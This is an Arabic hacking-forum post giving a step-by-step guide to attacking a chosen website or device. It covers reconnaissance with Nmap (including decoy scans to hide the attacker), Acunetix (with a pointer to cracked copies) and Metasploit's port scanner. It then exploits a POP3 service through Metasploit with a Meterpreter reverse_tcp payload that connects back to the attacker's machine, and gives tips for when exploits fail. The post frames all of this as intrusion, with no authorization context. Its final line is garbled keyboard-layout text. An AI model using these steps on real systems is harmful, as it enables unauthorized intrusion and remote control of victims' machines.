عدد النقاط : 10
السلام عليكم ورحمة الله وبركاتة كيف حال الشباب الطيبة ان شاء الله تكون بألف خير اعرف طولت عليكم بالمواضيع لكن الظروف والانشغلات . والله لا يشغلنا عن ذكره اليوم رح اضع بطريقة مبسطة وسهلة وواضحة عملية استهداف عن طريق الاختراق المتقدم الخطوات اللازمة للأستهداف 1-تحديد الهدف المراد اختراقه0 2-فحص الهدف0 3-البحث عن ثغرات مناسبه لعملية الاختراق0 4-استغلال الثغرة(سواء بالترجمة او بالميتا)0 -------------------- نبدأ بأسم الله الرحمن الرحيم اول نقطة تحديد الهدف المراد اختراقه اظن هذه الطريقة سهلة وهي الاساس . تحدد الموقع او الجهاز الذي تريد اختراقه وبامكانك تستخرج البورت بالأمر start >>run>>cmd>>>ping www.xxx.com www.xxx.com رابط الموقع ############# فحص الهدف هنا ناتي في الخطوة الثانية وهي عملية فحص الهدف المراد اختراقه 1- بأمكانك تستعمل اداة الفحص Acunetix 2-بأمكانك استخدام اداة NET TOOLS 3-بأمكانك استخدام استخدام اداة Nmap <<يفضل استخدامه 4-بأمكانك استخدام اداة auxiliary المدرجة مع الميتاسبلويت 5-في النهاية بأمكانك استخدام برامج اخرى تعرفها وتستخدمها انت كبرنامج ip scaner او غيرها هذا يرجع لك في الاستخدام لها ______________ نبدأ بشرح ستخدام اول اداة acunetix التحميل هنــأ واذا كان يحتاج كراك فانه متوافر بالنت بكثرة شرح الاداة اظن الشرح واضح ومفهوم وايضا يستخرج لك الثغرات xss واي شيء او الغاز غير مفهومة ارجوا عدم التردد في السؤال _________________ الاداة التانية وهي اداة NET TOOLS التي لا غنى عنها والمعروفة لدينا وتستخدم اكثر شيء في فحص الشبكات التحميل هنــأ شرح بسيط لها : _________________ الحين نأتي الى اهم اداه وهي اداة Nmap والتي شخصيا افضلها واستعملها بأستمرار لما تحتويه من اوامر قوية ودقيقة الفحص وسرعة ايضا في الفحص واكتشف نوع النظام نأتي لشرح هذه الاداة بأختصار التحميل هنــا الشرح من ناحية الشرح لن ينتهي ولكن سأضع شرح لأمر واحد وهو بالتالي نفس الروتين للاوامر الباقية فقط يختلف اكمن حرف بالامر الشرح لفحص الموقع من ناحية اكتشاف البورت والاسم والاصدار والنظام الاوامر الاكثر انتشارا واستخدام nmap -P0 www.site.com اكتشاف البورتات المفتوحة nmap -sV www.site.com الكشف عن البورتات المفتوحه +اصدار النظام +اسم البرنامج المركب nmap -sS www.site.com في حال لم ينجح الامر السابق ^_^ نستخدم هذا الامر nmap -sS -F 192.168.0.1-255 يستخدم في حال فحص شبكة كامل ويظهر فقط البورتات الاكثر شهرة وانتشارا nmap -sS -D 192.168.0.2, 192.168.0.3, 192.168.0.4 192.168.0.1 للأختفاء اثناء الفحص nmap -sS -A -p 80 192.168.0.1 تحديد النظام وجمع المعلومات ع المنفذ 80 nmap -sS -p 1-100 127.0.0.1 البحث في الايبيهات المحصورة بين 1 و 100 *ملاحظة: استبدل www.site.com بآي بي الموقع او رابط الموقع وايضا بالنسبة للـ192.168.0.1 استبدله بالرابط او الاي بي سواء للاجهزة وبأمكانك تستخدمه للمواقع وفي النهاية بأمكانك استخدام الواجهة الرسومية zenmap في عملية الفحص ______________________ الآن نأتي الى اداة auxiliary ولها اكثر من امر كما تعلمون نفتح الميتاسبلويت من الويب Start>>programs>>metasploit3>>Web Console وانتظر لحظات ورح يفتح معك من الويب على هذا الرابط http://127.0.0.1:55555 الحين نأتي للكونسول من فوق console ونضغط عليها رح تفتح الشاشة نضع الامر use scanner/portscan/tcp تعني استخدام الثغرة (اي نوع الفحص) ثم set RHOSTS 64.202.189.170 لتحديد الهدف المراد فحصه من البورتات 64.202.189.170 وبأمكانك وضع اي بي المراد فحصه سواء مواقع او اجهزة ثم خيار PORTS لتحديد نطاق البحث set PORTS 1-60000 وبامكانك تختار اي نطاق تريد حتى لو كنت تريد التاكد من ان بورت الاف تي بي فتوح اختار النطاق من 1 الى 21 بالأمر set PORTS 1-21 وباقي الخيارات غير مهمة وبعدها ضع الامر run من اجل البدأ في الفحص ورح تظهر لك البورتات المفتوحة دون الاصدار كما في الان ماب يعني في النهاية استخدام الان ماب افضل شيء لك _______________ والاداة الخامسة هي الادوات المتواجدة عندك والتي تستخدمها انت وتفضلها ################ الآن نأتي للخطوة الثالثة والرابع مع بعض: وهي خطوة البحث عن الثغرة المناسبة للأستغلال بعد عمليات الفحص التي قمنا بها والاستغلال يوجد هنا ادوات جاهزة كمشروع الميتاسبلويت يوجد به العديد من الثغرات الجاهزة التي تمكنك من الاختراق وفي حال عدم تواجدها في الميتاسبلويت بأمكانك الفحص في مواقع السكيورتي كالميلوورم او exploit-db.com البديل للميلوورم بعد توقفه او سكيورتيب فوكس او او او كلا حسب ما يفضله ويناسبه 0 من ناحية الميتاسبلويت نشرحه بطريقة سهلة وواضحه لنفرض انك في عملية الفحص في السابق وجدت البورت 110 الخاص بمنفذ pop3 وكما تعلمون يوجد له ثغرة بالميتاسبلويت استغلالها كالتالي . مثال:: في الميتاسبلويت الكونسول ضع الامر search pop3 ورح يظهر لك الاستغلالها المتوفرة اختر الاستغلال بالامر use متبوعا بالاسم او الرابط هكذا use linux/pop3/cyrus_pop3d_popsubfolders ثم show options لأظهار الخيارات المتاحة والمطلوبة من قبل المهاجم عند تنفيذ الامر انظر ما المطلوب فقط لمطلوب الاي بي المستهدف والبورت البورت اكتشفناه اثناء الفحص انه مفتوح والاي بي هو الاي بي او الموقع الذي تم فحصه واكتشاف انا المنفذ 110 مفتوح نكمل الاستغلال بعد تحديد الاي بي المراد اختراقه والذي ظهر لنا اثناء الفحص ونقوم بتحديد بالامر set RHOST 64.202.189.170 ثم نختار البايلود ويفضل تختار الميتربريتر او اي شيء تريده set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.5 اي بي جهاز المهاجم set LPORT 4444 بورت مفتوح في جهاز المهاجم ومن ثم امر الاستغلال exploit لكن في الثغرة يجب توافر نفس المتطلبات وايضا الكيرنل مع البرنامج Gentoo 2006.0 Linux 2.6 مع االبرنامج يعني يمكن هذه قديمة وما تنجح يوجد افضل منها فقط انت وبحثك مجرد مثال للتوضيح __ وفي الامكان ايضا استخدام مواقع السكيورتي في الفحص كما ذكرنا وطريقة الترجمة متوافرة بالنت وشروحات كثيرة لها واي استفسار من هذه الناحية ايضا انا موجود لا تتردد فقط. ########################### *ملاحظات ومشاكل قد تواجهك في عمليات الاختراق 1. عند استهداف موقع ما يجب ان تعرف معلومات الموقع كاملة كنظام تشغيل وبورتات مفتوحة واالسكربتات المتواجدة من اجل نجاح عملية الاستهداف 2. عند عدم نجاح اي ثغرة كانت هذا لا يعني انه لا تتوافر ثغرات بالموقع او انه عملية الاختراق المتقدم غير قعالة وناجحة للأختراق وانما ذلك يرجع الى عدم توافر المتطلبات المناسبة كـ النظام يختلف عدم تواجد البورت او عدم تناسق الاصدار او البورت او البرنامج الركاب مع الثغرة او حجب الاي بي بتاعك اثناء عملية الفحص مما يؤدي الى عدم عمليات الرد اثناء الفحص او اظهار نتائج خاطئة او عدم اظهار نتائج اصلا بسبب حماية السيرفر مما يؤدي الى فقدان الامل وهذا خطا وانما حاول باكثر من طريقة واداة او اسال وستجد ضالتك اذا لم تجد استغلال مناسب فأكتشف انت استغلال واصنعه <<< بالنسبة لي ولكم لا احد يستطيع هذا لكن مع الدورات والتعلم البفر رح تعرف بأذن الله يفضل يكون الشخص ملم ببعض البرمجيات من اجل فهم الثغرة وفهم عملية استغلالها كأتقان لغة php , html , perl , python , c++ , C هذه افضل لفات البرمجة بالنسبة للمخترق او البنتشريشن تيست بالاضافة الى باقي الاناوع لكن هذه الاساس ########### من ناحية الاستفسارات ما رح اقصر بأذن الله فقط مجرد مبادرة منك بطرح الاستفسار وسيت الاجابة عليه سواء من قبلي او من قبل غيري والاعضاء ما يقصرون اي شء خطء في الشرح ارجوا تنبيهي #### تحياتي لا للاحتكار المجهوول المصدر: :: vBspiders Professional Network ::pwvdh:avp hghsji]ht fhghojvhr hgljr]l
pwvdh:avp hghsji]ht fhghojvhr hgljr]l